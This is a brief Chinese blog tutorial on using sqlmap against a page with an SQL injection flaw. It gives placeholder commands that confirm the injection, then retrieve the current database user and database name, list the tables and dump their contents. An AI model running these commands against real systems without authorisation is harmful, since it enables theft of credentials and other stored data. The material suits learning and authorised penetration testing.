文享日志

sqlmap自动注入工具

Linux 渗透

发表于2018年02月16日10:32:18

0条评论 220次阅读

  sqlmap是一个命令行工具,可以帮我们检测目标是否存在sql注入漏洞,以及获取应用用户名,密码等。。


在存在SQL注入漏洞的界面,我们随机提交一组数据,观察url,

将url拷贝。


确认注入存在,获取当前用户与数据库名

sqlmap -u 粘贴拷贝的链接 -p username --current-user --current-db

-p告诉sqlmap我们打算在用户名参数中查找注入.一旦漏洞被利用,我们要获得当前数据库用户名和数据库名称


获取当前用户数据库中表名

sqlmap -u 粘贴拷贝的链接 -p username -D 获取的数据库名称 --tables


查看表数据

sqlmap -u 粘贴拷贝的链接 -p username -D 获取的数据库名称 --T 表名 --dump


👍 0  👎 0
共有0条评论

发表新评论

提交

广告展示

腾讯云推广 阿里云推广